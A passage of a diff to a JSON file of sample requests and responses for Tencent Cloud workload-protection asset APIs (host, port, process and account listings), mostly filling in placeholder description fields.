\"InstanceId\": \"ins-dusahs86\",\n \"UpdateTime\": \"2024-11-03 04:07:17\",\n \"FirstTime\": \"2024-01-25 13:12:10\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"139.199.156.164\",\n \"PrivateIP\": \"172.16.0.13\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-8fs960h1\",\n \"InstanceID\": \"ins-dusahs86\",\n \"HostName\": \"activity-cvm-2023-10-08\"\n }\n },\n \"RequestId\": \"454e1f90-6e84-4492-a0ce-460c7515502d\"\n }\n}",
|
734
720
|
"title": "获取资产管理主机资源详细信息"
|
735
721
|
}
|
736
722
|
],
|
@@ -738,7 +724,7 @@
|
|
738
724
|
{
|
739
725
|
"document": "获取资源监控列表",
|
740
726
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetMachineList\n<公共请求参数>\n\n{}",
|
741
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Machines\": [\n {\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Cpu\": \"Intel(R) Xeon(R) Gold 6148 CPU @ 2.40GHz\",\n \"MemSize\": 1,\n \"MemLoad\": \"
|
727
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Machines\": [\n {\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Cpu\": \"Intel(R) Xeon(R) Gold 6148 CPU @ 2.40GHz\",\n \"MemSize\": 1,\n \"MemLoad\": \"49\",\n \"DiskSize\": 1,\n \"DiskLoad\": \"41\",\n \"PartitionCount\": 1,\n \"MachineWanIp\": \"110.84.0.11\",\n \"ProjectId\": 1,\n \"CpuSize\": 1,\n \"CpuLoad\": \"Intel(R) Xeon(R) Gold 6148 CPU @ 2.40GHz\",\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
742
728
|
"title": "获取资源监控列表"
|
743
729
|
}
|
744
730
|
],
|
@@ -746,7 +732,7 @@
|
|
746
732
|
{
|
747
733
|
"document": "",
|
748
734
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetMachineTagTop\n<公共请求参数>\n\n{}",
|
749
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
735
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Tags\": [\n {\n \"Value\": 10,\n \"Desc\": \"idesc\",\n \"Key\": \"total\",\n \"NewCount\": 0\n }\n ]\n }\n}",
|
750
736
|
"title": "获取主机标签Top5"
|
751
737
|
}
|
752
738
|
],
|
@@ -762,7 +748,7 @@
|
|
762
748
|
{
|
763
749
|
"document": "",
|
764
750
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetPortCount\n<公共请求参数>\n\n{\n \"Port\": \"1\"\n}",
|
765
|
-
"output": "{\n \"Response\": {\n \"Ports\": [\n {\n \"Value\": 101,\n \"Key\": \"value1\",\n \"Desc\": \"\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n}",
|
751
|
+
"output": "{\n \"Response\": {\n \"Ports\": [\n {\n \"Value\": 101,\n \"Key\": \"value1\",\n \"Desc\": \"idesc\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n}",
|
766
752
|
"title": "获取所有端口数量"
|
767
753
|
}
|
768
754
|
],
|
@@ -770,7 +756,7 @@
|
|
770
756
|
{
|
771
757
|
"document": "",
|
772
758
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetPortInfoList\n<公共请求参数>\n\n{}",
|
773
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Ports\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"ProcessName\": \"test-name\",\n \"ProcessVersion\": \"0.1.1\",\n \"ProcessPath\": \"/data\",\n \"Pid\": \"1024\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Param\": \"null\",\n \"Teletype\": \"1\",\n \"Port\": \"22\",\n \"GroupName\": \"test-name\",\n \"Md5\": \"
|
759
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Ports\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"ProcessName\": \"test-name\",\n \"ProcessVersion\": \"0.1.1\",\n \"ProcessPath\": \"/data\",\n \"Pid\": \"1024\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Param\": \"null\",\n \"Teletype\": \"1\",\n \"Port\": \"22\",\n \"GroupName\": \"test-name\",\n \"Md5\": \"708cae4cf814c3deda4208da228fad4e\",\n \"Ppid\": \"1\",\n \"ParentProcessName\": \"test-name\",\n \"Proto\": \"http\",\n \"BindIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
774
760
|
"title": "获取资产管理端口列表"
|
775
761
|
}
|
776
762
|
],
|
@@ -778,7 +764,7 @@
|
|
778
764
|
{
|
779
765
|
"document": "",
|
780
766
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetProcessCount\n<公共请求参数>\n\n{\n \"Name\": \"host1\"\n}",
|
781
|
-
"output": "{\n \"Response\": {\n \"Process\": [\n {\n \"Key\": \"key1\",\n \"Value\": 10,\n \"Desc\": \"desc of key1\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"
|
767
|
+
"output": "{\n \"Response\": {\n \"Process\": [\n {\n \"Key\": \"key1\",\n \"Value\": 10,\n \"Desc\": \"desc of key1\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
782
768
|
"title": "获取所有进程数量"
|
783
769
|
}
|
784
770
|
],
|
@@ -786,7 +772,7 @@
|
|
786
772
|
{
|
787
773
|
"document": "",
|
788
774
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetProcessInfoList\n<公共请求参数>\n\n{}",
|
789
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Process\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"
|
775
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Process\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Uuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Desc\": \"none\",\n \"Path\": \"/root\",\n \"Pid\": \"10011\",\n \"User\": \"root\",\n \"StartTime\": \"2024-10-11 12:23:34\",\n \"Param\": \"iparam\",\n \"Tty\": \"/bin\",\n \"Version\": \"0.1.1.1\",\n \"GroupName\": \"test-name\",\n \"Md5\": \"708cae4cf814c3deda4208da228fad4e\",\n \"Ppid\": \"22\",\n \"ParentProcessName\": \"test-name\",\n \"Status\": \"Running\",\n \"HasSign\": 1,\n \"InstallByPackage\": 1,\n \"PackageName\": \"test-name\",\n \"MachineName\": \"test-name\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-11\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
790
776
|
"title": "获取资产管理进程列表"
|
791
777
|
}
|
792
778
|
],
|
@@ -794,7 +780,7 @@
|
|
794
780
|
{
|
795
781
|
"document": "",
|
796
782
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetRecentMachineInfo\n<公共请求参数>\n\n{\n \"BeginDate\": \"2020-09-22\",\n \"EndDate\": \"2020-09-22\"\n}",
|
797
|
-
"output": "{\n \"Response\": {\n \"RiskList\": [\n {\n \"Value\": 10,\n \"Key\": \"App\",\n \"Desc\": \"softwares\",\n \"NewCount\": 0\n }\n ],\n \"LiveList\": [\n {\n \"Value\": 20,\n \"Key\": \"frame\",\n \"Desc\": \"\",\n \"NewCount\": 0\n }\n ],\n \"TotalList\": [\n {\n \"Value\": 30,\n \"Key\": \"Web\",\n \"Desc\": \"web app\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"a8658ae6-0cd1-47f0-99b0-f144f01e9066\",\n \"OfflineList\": [\n {\n \"Value\": 40,\n \"Key\": \"total\",\n \"Desc\": \"total\",\n \"NewCount\": 0\n }\n ]\n }\n}",
|
783
|
+
"output": "{\n \"Response\": {\n \"RiskList\": [\n {\n \"Value\": 10,\n \"Key\": \"App\",\n \"Desc\": \"softwares\",\n \"NewCount\": 0\n }\n ],\n \"LiveList\": [\n {\n \"Value\": 20,\n \"Key\": \"frame\",\n \"Desc\": \"softwares\",\n \"NewCount\": 0\n }\n ],\n \"TotalList\": [\n {\n \"Value\": 30,\n \"Key\": \"Web\",\n \"Desc\": \"web app\",\n \"NewCount\": 0\n }\n ],\n \"RequestId\": \"a8658ae6-0cd1-47f0-99b0-f144f01e9066\",\n \"OfflineList\": [\n {\n \"Value\": 40,\n \"Key\": \"total\",\n \"Desc\": \"total\",\n \"NewCount\": 0\n }\n ]\n }\n}",
|
798
784
|
"title": "获取主机概况趋势"
|
799
785
|
}
|
800
786
|
],
|
@@ -802,7 +788,7 @@
|
|
802
788
|
{
|
803
789
|
"document": "获取资产管理系统安装包列表",
|
804
790
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetSystemPackageList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Filters\": [],\n \"Offset\": 1\n}",
|
805
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Packages\": [\n {\n \"Name\": \"test-name\",\n \"Desc\": \"\",\n \"Version\": \"0.1.1\",\n \"InstallTime\": \"2024-10-11 12:23:34\",\n \"Type\": \"Web\",\n \"MachineName\": \"test-name\",\n \"MachineIp\": \"10.0.0.11\",\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n },\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
791
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Packages\": [\n {\n \"Name\": \"test-name\",\n \"Desc\": \"idesc\",\n \"Version\": \"0.1.1\",\n \"InstallTime\": \"2024-10-11 12:23:34\",\n \"Type\": \"Web\",\n \"MachineName\": \"test-name\",\n \"MachineIp\": \"10.0.0.11\",\n \"OsInfo\": \"CentOs Bit64\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n },\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
806
792
|
"title": "获取资产管理系统安装包列表"
|
807
793
|
}
|
808
794
|
],
|
@@ -810,7 +796,7 @@
|
|
810
796
|
{
|
811
797
|
"document": "获取所有资源数量",
|
812
798
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetTotalCount\n<公共请求参数>\n\n{}",
|
813
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"058e4d84-10de-4943-8b30-2a50f204f7c7\",\n \"Types\": [\n {\n \"Desc\": \"\",\n \"Key\": \"system\",\n \"NewCount\": 0,\n \"Value\": 531\n },\n {\n \"Desc\": \"\",\n \"Key\": \"account\",\n \"NewCount\": 0,\n \"Value\": 6526360\n },\n {\n \"Desc\": \"\",\n \"Key\": \"port\",\n \"NewCount\": 0,\n \"Value\": 2355\n },\n {\n \"Desc\": \"\",\n \"Key\": \"app\",\n \"NewCount\": 8,\n \"Value\": 3193\n },\n {\n \"Desc\": \"\",\n \"Key\": \"process\",\n \"NewCount\": 21,\n \"Value\": 21749346\n },\n {\n \"Desc\": \"\",\n \"Key\": \"database\",\n \"NewCount\": 1,\n \"Value\": 18\n },\n {\n \"Desc\": \"\",\n \"Key\": \"webapp\",\n \"NewCount\": 0,\n \"Value\": 4\n },\n {\n \"Desc\": \"\",\n \"Key\": \"webservice\",\n \"NewCount\": 0,\n \"Value\": 17\n },\n {\n \"Desc\": \"\",\n \"Key\": \"webframe\",\n \"NewCount\": 0,\n \"Value\": 5\n },\n {\n \"Desc\": \"\",\n \"Key\": \"weblocation\",\n \"NewCount\": 0,\n \"Value\": 11\n },\n {\n \"Desc\": \"\",\n \"Key\": \"jar\",\n \"NewCount\": 0,\n \"Value\": 1086\n },\n {\n \"Desc\": \"\",\n \"Key\": \"initservice\",\n \"NewCount\": 0,\n \"Value\": 1922\n },\n {\n \"Desc\": \"\",\n \"Key\": \"plantask\",\n \"NewCount\": 0,\n \"Value\": 2950\n },\n {\n \"Desc\": \"\",\n \"Key\": \"env\",\n \"NewCount\": 0,\n \"Value\": 5914763\n },\n {\n \"Desc\": \"\",\n \"Key\": \"coremodule\",\n \"NewCount\": 0,\n \"Value\": 22143622\n },\n {\n \"Desc\": \"\",\n \"Key\": \"package\",\n \"NewCount\": 0,\n \"Value\": 310039\n }\n ]\n }\n}",
|
799
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"058e4d84-10de-4943-8b30-2a50f204f7c7\",\n \"Types\": [\n {\n \"Desc\": \"none\",\n \"Key\": \"system\",\n \"NewCount\": 0,\n \"Value\": 531\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"account\",\n \"NewCount\": 0,\n \"Value\": 6526360\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"port\",\n \"NewCount\": 0,\n \"Value\": 2355\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"app\",\n \"NewCount\": 8,\n \"Value\": 3193\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"process\",\n \"NewCount\": 21,\n \"Value\": 21749346\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"database\",\n \"NewCount\": 1,\n \"Value\": 18\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"webapp\",\n \"NewCount\": 0,\n \"Value\": 4\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"webservice\",\n \"NewCount\": 0,\n \"Value\": 17\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"webframe\",\n \"NewCount\": 0,\n \"Value\": 5\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"weblocation\",\n \"NewCount\": 0,\n \"Value\": 11\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"jar\",\n \"NewCount\": 0,\n \"Value\": 1086\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"initservice\",\n \"NewCount\": 0,\n \"Value\": 1922\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"plantask\",\n \"NewCount\": 0,\n \"Value\": 2950\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"env\",\n \"NewCount\": 0,\n \"Value\": 5914763\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"coremodule\",\n \"NewCount\": 0,\n \"Value\": 22143622\n },\n {\n \"Desc\": \"none\",\n \"Key\": \"package\",\n \"NewCount\": 0,\n \"Value\": 310039\n }\n ]\n }\n}",
|
814
800
|
"title": "获取所有资源数量"
|
815
801
|
}
|
816
802
|
],
|
@@ -818,7 +804,7 @@
|
|
818
804
|
{
|
819
805
|
"document": "",
|
820
806
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetTypeTop\n<公共请求参数>\n\n{}",
|
821
|
-
"output": "{\n \"Response\": {\n \"
|
807
|
+
"output": "{\n \"Response\": {\n \"Database\": [\n {\n \"Key\": \"SQL Server\",\n \"Value\": 2,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"Port\": [\n {\n \"Key\": \"10250\",\n \"Value\": 21,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"Process\": [\n {\n \"Key\": \"svchost.exe\",\n \"Value\": 241,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"RequestId\": \"1693599e-ff8f-4a8c-ae39-b4d9ba3ae9bf\",\n \"Software\": [\n {\n \"Key\": \"NTP\",\n \"Value\": 37,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"User\": [\n {\n \"Key\": \"lp\",\n \"Value\": 53,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"WebApp\": [\n {\n \"Key\": \"phpMyAdmin\",\n \"Value\": 6,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"WebFrame\": [\n {\n \"Key\": \"hibernate\",\n \"Value\": 3,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"WebLocation\": [\n {\n \"Key\": \"localhost\",\n \"Value\": 9,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ],\n \"WebService\": [\n {\n \"Key\": \"Nginx\",\n \"Value\": 25,\n \"NewCount\": 0,\n \"Desc\": \"none\"\n }\n ]\n }\n}",
|
822
808
|
"title": "获取各种类型资源Top5"
|
823
809
|
}
|
824
810
|
],
|
@@ -826,7 +812,7 @@
|
|
826
812
|
{
|
827
813
|
"document": "",
|
828
814
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetTypes\n<公共请求参数>\n\n{}",
|
829
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
815
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"1ce68339-8828-457f-b358-d5b1b34e4fe9\",\n \"Types\": [\n {\n \"Id\": 1,\n \"Name\": \"name\"\n }\n ]\n }\n}",
|
830
816
|
"title": "DescribeAssetTypes"
|
831
817
|
}
|
832
818
|
],
|
@@ -834,7 +820,7 @@
|
|
834
820
|
{
|
835
821
|
"document": "",
|
836
822
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetUserCount\n<公共请求参数>\n\n{\n \"Name\": \"staff\"\n}",
|
837
|
-
"output": "{\n \"Response\": {\n \"Users\": [\n {\n \"Key\": \"staff\",\n \"Value\": 10,\n \"Desc\": \"\",\n \"NewCount\": 20\n }\n ],\n \"RequestId\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n}",
|
823
|
+
"output": "{\n \"Response\": {\n \"Users\": [\n {\n \"Key\": \"staff\",\n \"Value\": 10,\n \"Desc\": \"none\",\n \"NewCount\": 20\n }\n ],\n \"RequestId\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n }\n}",
|
838
824
|
"title": "获取所有账号数量"
|
839
825
|
}
|
840
826
|
],
|
@@ -842,7 +828,7 @@
|
|
842
828
|
{
|
843
829
|
"document": "",
|
844
830
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetUserInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Name\": \"test_user\"\n}",
|
845
|
-
"output": "{\n \"Response\": {\n \"User\": {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uid\": \"1011223\",\n \"Gid\": \"1011223\",\n \"Status\": 1,\n \"IsRoot\": 1,\n \"LastLoginTime\": \"2024-10-11 12:23:34\",\n \"Name\": \"test-name\",\n \"UserType\": 1,\n \"IsDomain\": 1,\n \"IsSshLogin\": 1,\n \"HomePath\": \"/root\",\n \"Shell\": \"/bin/sh\",\n \"ShellLoginStatus\": 1,\n \"PasswordChangeTime\": \"2024-10-11 12:23:34\",\n \"PasswordDueTime\": \"2024-10-11 12:23:34\",\n \"PasswordLockDays\": 0,\n \"Remark\": \"\",\n \"GroupName\": \"test-name\",\n \"DisableTime\": \"2024-10-11 12:23:34\",\n \"LastLoginTerminal\": \"
|
831
|
+
"output": "{\n \"Response\": {\n \"User\": {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineName\": \"test-name\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uid\": \"1011223\",\n \"Gid\": \"1011223\",\n \"Status\": 1,\n \"IsRoot\": 1,\n \"LastLoginTime\": \"2024-10-11 12:23:34\",\n \"Name\": \"test-name\",\n \"UserType\": 1,\n \"IsDomain\": 1,\n \"IsSshLogin\": 1,\n \"HomePath\": \"/root\",\n \"Shell\": \"/bin/sh\",\n \"ShellLoginStatus\": 1,\n \"PasswordChangeTime\": \"2024-10-11 12:23:34\",\n \"PasswordDueTime\": \"2024-10-11 12:23:34\",\n \"PasswordLockDays\": 0,\n \"Remark\": \"halt\",\n \"GroupName\": \"test-name\",\n \"DisableTime\": \"2024-10-11 12:23:34\",\n \"LastLoginTerminal\": \"ssh******\",\n \"LastLoginLoc\": \"usa\",\n \"LastLoginIp\": \"10.0.0.11\",\n \"PasswordWarnDays\": 1,\n \"PasswordChangeType\": 1,\n \"Keys\": [\n {\n \"Value\": \"test1\",\n \"Comment\": \"name\",\n \"EncryptType\": \"md5\"\n }\n ],\n \"UpdateTime\": \"2024-10-11 12:23:34\"\n },\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
846
832
|
"title": "获取主机账号详情"
|
847
833
|
}
|
848
834
|
],
|
@@ -850,7 +836,7 @@
|
|
850
836
|
{
|
851
837
|
"document": "",
|
852
838
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetUserKeyList\n<公共请求参数>\n\n{\n \"Name\": \"name1\",\n \"Offset\": 0,\n \"Limit\": 10,\n \"Uuid\": \"6cf3c132-aaa-bbbb-b08d-98be9421372a\",\n \"Quuid\": \"6cf3c132-aaa-bbbb-b08d-98be9421372a\"\n}",
|
853
|
-
"output": "{\n \"Response\": {\n \"Keys\": [\n {\n \"Value\": \"
|
839
|
+
"output": "{\n \"Response\": {\n \"Keys\": [\n {\n \"Value\": \"root\",\n \"Comment\": \"desc of value1\",\n \"EncryptType\": \"aes\"\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\"\n }\n}",
|
854
840
|
"title": "获取主机账号Key列表"
|
855
841
|
}
|
856
842
|
],
|
@@ -858,7 +844,7 @@
|
|
858
844
|
{
|
859
845
|
"document": "",
|
860
846
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetUserList\n<公共请求参数>\n\n{}",
|
861
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Users\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uid\": \"
|
847
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Users\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uid\": \"1001\",\n \"Gid\": \"1002\",\n \"Status\": 1,\n \"IsRoot\": 1,\n \"LoginType\": 1,\n \"LastLoginTime\": \"2024-10-11 12:23:34\",\n \"Name\": \"test-name\",\n \"ProjectId\": 1,\n \"UserType\": 1,\n \"IsDomain\": 1,\n \"IsSudo\": 1,\n \"IsSshLogin\": 1,\n \"HomePath\": \"/root\",\n \"Shell\": \"/bin/sh\",\n \"ShellLoginStatus\": 1,\n \"PasswordChangeTime\": \"2024-10-11 12:23:34\",\n \"PasswordDueTime\": \"2024-10-11 12:23:34\",\n \"PasswordLockDays\": 0,\n \"PasswordStatus\": 0,\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
862
848
|
"title": "获取账号列表"
|
863
849
|
}
|
864
850
|
],
|
@@ -874,7 +860,7 @@
|
|
874
860
|
{
|
875
861
|
"document": "",
|
876
862
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebAppList\n<公共请求参数>\n\n{}",
|
877
|
-
